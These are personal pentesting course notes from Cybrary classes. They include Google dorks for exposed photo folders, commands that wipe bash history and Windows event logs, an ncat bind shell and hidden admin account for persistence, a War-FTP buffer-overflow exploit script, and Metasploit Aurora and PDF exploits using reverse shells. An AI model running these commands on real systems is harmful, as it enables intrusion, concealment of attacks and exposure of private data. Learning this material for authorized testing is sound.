Vitali Kremez

Social Engineering and Manipulation

1/25/2016

Course: Dean Pompilio on "Social Engineering and Manipulation" at Cybrary

Social Engineering (SE) Tools:

*Cewl
Use Cewl’s spidering process to generate a word list for password cracking


*Cupp
This tool allows you to generate a list of possible passwords to use in the Dictionary file.

cupp.py -l
cupp.py -

*Creepy
Account enumerator tool that does account harvesting

*Dradis
SE platform


*Google
[site:edu|org + inurl:"faculty_login.asp | .php"

intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camera Roll"
intitle:"Index of" "DCIM"
inurl:"CrazyWWWBoard.cgi" intext:"detailed debugging information"
intitle:"Retina Report" intext:"Confidential Information"]

*Maltego
Data visualization tool

*Recon-NG

show modules
use netcraft
set source [ANY WEBSITE NAME]
show hosts
use recon/hosts-hosts/resolve
run
use discovery/info_disclosure/interesting_files
use recon/domains-hosts/brute_hosts
use ipinfodb
use pgp
del contacts 1-12
use recon/contacts-credentials/pwnedlist
use reporting/html

*Scythe Framework
Account enumerator tool that does account harvesting. 

*Creepy
Geolocates a target by using various social networking platforms to track individuals.

*Shodan
Crawls the Internet and identifies IP addresses that have a service running. Then it does a banner grab of the service that is running, and it saves the banner information. 

Social Engineering Toolkit (SET) [*use TinyURL to obfuscate links]


Post Exploitation: Covering Tracks

1/24/2016

Course: Joe Perry on "Post Exploitation Hacking" at Cybrary

Linux Tracks
~/.bash_history
cp ~/.bash_history ~/.bash_history-save
rm ~/.bash_history OR : > ~/.bash_history (truncate the file to zero length)

Linux Timestamps
•touch -d '1 May 2005 10:22' file (-d takes a free-form date string; -t expects [[CC]YY]MMDDhhmm[.ss])

Windows Event Logs
•They're managed on the command line by wevtutil
wevtutil el (enumerate the log names)
wevtutil cl <LogName> (clear the named log)

Post Exploitation: Persistence and Backdoor

1/24/2016

Course: Joe Perry on "Post Exploitation Hacking" at Cybrary
I. Remote Desktop Protocol - RDP

*Windows native RDP 
*Chrome RDP (or any other third-party RDP)

Setting up the Windows Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

•netsh – network administration tool
•advfirewall – identifies that you're working with the Windows "advanced" firewall
•firewall – specifies that this is a firewall rule operation, not something else governed by advfirewall
•set rule group="remote desktop" – selects that specific rule group for modification
•new enable=Yes – enables the rules, allowing RDP connections

Editing the registry key
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

•reg add – writes a value into a registry key
•"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" – the key we're modifying
•/v fDenyTSConnections – the value name we're setting
•/t REG_DWORD – the data type (int/DWORD/string/etc.)
•/d 0 – the data stored under that value name (0 = connections are not denied)
•/f – force: overwrite an existing value without prompting

II. Ncat Backdoor
ncat -lkp 51000 -e "cmd.exe"

•-lkp 51000 – listen, keep listening after a client disconnects, on port 51000
•-e "cmd.exe" – when a connection arrives, execute this command and attach its I/O pipes to the connection

III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4

IV. Scheduled Tasks
schtasks
at

Post Exploitation: Workstation and Network Analysis

1/24/2016

Course: Joe Perry on "Post Exploitation Hacking" at Cybrary
Workstation and Network Analysis 

I. Linux
A. Workstation
•Ifconfig
•Netstat (+netstat -g/ -r/ -i/ -s)
•Arp
•/etc/nsswitch.conf
•/etc/resolv.conf

B. Network
•Ping/traceroute
•ping -t 1 <target> (TTL of 1: the first hop that answers is your default gateway)
•Nmap
•P0f [passive OS fingerprinting]
•Tcpdump
•Tshark

II. Windows
A. Workstation
•Ipconfig
•Netstat
•Arp
•Net * (there’s a lot)

B. Network
•nslookup
•Tracert
•net * (accounts; config; group; session; statistics; view; start)
•wmic [Windows Management Instrumentation]
E.g., wmic useraccount
E.g., wmic startup get caption,command

Post Exploitation: Basics of Networking

1/24/2016

Course: Joe Perry on "Post Exploitation Hacking" at Cybrary
I. Ethernet Header:
•Src: Vmware_22:dd:ce (00:0c:29:22:dd:ce), Dst: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•Destination: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•Address: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
•        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)

II. IP Header
•Internet Protocol Version 4, Src: 192.168.129.128 (192.168.129.128), Dst: 31.13.71.128 (31.13.71.128)
•    Version: 4    Header length: 20 bytes   
•Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
•        0000 00.. = Differentiated Services Codepoint: Default (0x00)
•        .... ..00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00)
•    Total Length: 40    Identification: 0x0364 (868)
•    Flags: 0x02 (Don't Fragment)
•        0... .... = Reserved bit: Not set
•        .1.. .... = Don't fragment: Set
•        ..0. .... = More fragments: Not set
•    Fragment offset: 0    Time to live: 64    Protocol: TCP (6)
•    Header checksum: 0x8eb6 [validation disabled]
•        [Good: False]
•        [Bad: False]
•    Source: 192.168.129.128 (192.168.129.128)    Destination: 31.13.71.128 (31.13.71.128)
•    [Source GeoIP: Unknown]    [Destination GeoIP: Unknown]

III. TCP header
•Transmission Control Protocol, Src Port: 44277 (44277), Dst Port: https (443), Seq: 2537, Ack: 19459, Len: 0
•Source port: 44277 (44277)    Destination port: https (443)
•Sequence number: 2537    (relative sequence number)    Acknowledgment number: 19459    (relative ack number)
•    Header length: 20 bytes
•    Flags: 0x010 (ACK)
•        000. .... .... = Reserved: Not set
•        ...0 .... .... = Nonce: Not set
•        .... 0... .... = Congestion Window Reduced (CWR): Not set
•        .... .0.. .... = ECN-Echo: Not set
•        .... ..0. .... = Urgent: Not set
•        .... ...1 .... = Acknowledgment: Set
•        .... .... 0... = Push: Not set
•        .... .... .0.. = Reset: Not set
•        .... .... ..0. = Syn: Not set
•        .... .... ...0 = Fin: Not set
•    Window size value: 65160
•Checksum: 0xa8d0 [validation disabled]

IV. UDP Header
•User Datagram Protocol, Src Port: db-lsp-disc (17500), Dst Port: db-lsp-disc (17500)
•    Source port: db-lsp-disc (17500)
•    Destination port: db-lsp-disc (17500)
•    Length: 122
•    Checksum: 0x5b02 [validation disabled]
•        [Good Checksum: False]
•        [Bad Checksum: False]
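The dissector output above shows the IPv4 and TCP fields but leaves checksum validation disabled. The following is an added example (not part of the course notes): it rebuilds the IPv4 header from the values in the dump, computes the RFC 791 header checksum (which comes out to the 0x8eb6 Wireshark displays), parses the fields back out, and decodes the TCP flags word. The sample header is constructed inline from the dump's values; only the standard library is used.

```python
import socket
import struct


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum of 16-bit words. Over a header whose
    checksum field is zeroed it yields the checksum to store; over a header
    that already carries a valid checksum it yields 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4_header(src, dst, total_len, ident, ttl, proto, df=True):
    """Build a 20-byte IPv4 header (no options) with a correct checksum."""
    flags_frag = 0x4000 if df else 0        # DF is the second-highest bit
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]


def parse_ipv4_header(raw: bytes) -> dict:
    """Decode the fields shown in the dump above and really verify the checksum."""
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum = struct.unpack("!BBHHHBBH", raw[:12])
    ihl = (ver_ihl & 0x0F) * 4              # header length in bytes
    return {
        "version": ver_ihl >> 4, "header_len": ihl,
        "dscp": tos >> 2, "ecn": tos & 0x03,
        "total_len": total_len, "id": ident,
        "df": bool(flags_frag & 0x4000), "mf": bool(flags_frag & 0x2000),
        "frag_offset": flags_frag & 0x1FFF,
        "ttl": ttl, "proto": proto, "checksum": csum,
        "checksum_ok": ipv4_checksum(raw[:ihl]) == 0,
        "src": socket.inet_ntoa(raw[12:16]), "dst": socket.inet_ntoa(raw[16:20]),
    }


TCP_FLAG_BITS = [(0x100, "NS"), (0x080, "CWR"), (0x040, "ECE"), (0x020, "URG"),
                 (0x010, "ACK"), (0x008, "PSH"), (0x004, "RST"), (0x002, "SYN"), (0x001, "FIN")]


def tcp_flag_names(flags: int) -> list:
    """Names of the set bits in the 9-bit TCP flags field (0x010 -> ['ACK'])."""
    return [name for bit, name in TCP_FLAG_BITS if flags & bit]


# Constructed sample: the IP header values from the dump above
# (src 192.168.129.128, dst 31.13.71.128, length 40, id 0x0364, DF, TTL 64, TCP).
SAMPLE_HEADER = build_ipv4_header("192.168.129.128", "31.13.71.128", 40, 0x0364, 64, 6)

if __name__ == "__main__":
    print(parse_ipv4_header(SAMPLE_HEADER))
    print(tcp_flag_names(0x010))
```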

Advanced Exploitation: Part 2

1/24/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary

*Give the program too much input in the username (USER) field
*The saved return pointer will be overwritten with our attacker-controlled input

I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow

#!/usr/bin/python
import socket
buffer = "A" * 1100                                  # oversized USER argument
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.5.44', 21))                      # FTP control connection
response = s.recv(1024)                              # read the server banner
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()

II. Immunity Debugger -> Attach to the Process

III. Mona.py
An exploit development plugin for Immunity Debugger and WinDbg by the Corelan Team.

Set up logging: !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite
!mona pattern_create 1100

IV. Mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory

It reports whether the pattern has landed in a register (e.g. EIP) and the offset of that value from the beginning of the pattern.

Verifying Offsets
#!/usr/bin/python
import socket
# 485 bytes up to the saved return address, 4 bytes that should land in EIP,
# then filler to keep the total at 1100 bytes
buffer = "A" * 485 + "B" * 4 + "C" * 611
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.20.10', 21))                     # FTP control connection
response = s.recv(1024)                              # read the server banner
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()
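The steps above (pattern_create, findmsp, then the verification script) rely on one property of the cyclic pattern: every 4-byte window is unique, so a value observed in a register maps back to exactly one offset. The block below is an added example, not mona's or Metasploit's own code: it reimplements that pattern scheme and the offset lookup, using the constructed 1100-byte pattern and the offset 485 from the script above.

```python
import string


def pattern_create(length: int) -> str:
    """Cyclic pattern in the Metasploit/mona style. Consecutive triples are
    (uppercase, lowercase, digit) with the digit changing fastest, so every
    4-character window within the first 20280 bytes is unique."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]          # caller asked for more than one cycle


def pattern_offset(pattern: str, value) -> int:
    """Map a value seen in a register back to its offset in the pattern.
    `value` is either the 4 ASCII characters or the 32-bit integer a debugger
    shows for them (x86 is little-endian, so the integer is byte-reversed).
    Returns -1 when the value is not part of the pattern."""
    if isinstance(value, int):
        value = value.to_bytes(4, "little").decode("ascii", errors="replace")
    return pattern.find(value)


# Constructed sample: the 1100-byte pattern produced by `!mona pattern_create 1100` above.
SAMPLE_PATTERN = pattern_create(1100)

if __name__ == "__main__":
    seen = SAMPLE_PATTERN[485:489]        # the 4 bytes that would be reported in EIP
    print(seen, pattern_offset(SAMPLE_PATTERN, seen))
```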

Exploit Development: Fundamentals

1/18/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
x86 General Purpose Registers
EIP - instruction pointer
ESP - stack pointer
EBP - base pointer
ESI -  source index
EDI - destination index
EAX - accumulator
EBX - base
ECX - counter
EDX - data 

Sample of Vulnerable Code (C) overflowtest.c:
#include <stdio.h>
#include <string.h>

void overflowed() {
    /* never called by the normal control flow */
    printf("%s\n", "Execution Hijacked");
}

void function1(char *str) {
    char buffer[5];          /* fixed-size stack buffer */
    strcpy(buffer, str);     /* no bounds check: longer input overflows */
}

int main(int argc, char *argv[]) {
    if (argc < 2)
        return 1;
    function1(argv[1]);
    printf("%s\n", "Executed normally");
    return 0;
}

Vulnerability:
(1) strcpy does not perform bounds checking.
(2) strcpy is used to copy user input into a fixed-size variable.
Therefore, if we give it more data than the variable can hold, the copying will continue into adjacent memory addresses.


Advanced Penetration Testing: Post Exploitation

1/18/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
(1) Metasploit Scripts:

msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf > use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb


Bypassing Anti-Virus Signature Detection

1/18/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
Trojans:  Bypassing Anti-Virus Signature Detection

Techniques:
1- Binary Embedding 
2- Metasploit Encoding
3- Multi-Encoding
4- Combining Techniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion 
8- Veil


Advanced Exploitation

1/17/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
(1) Client Side Exploits

Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444



Author: Vitali Kremez
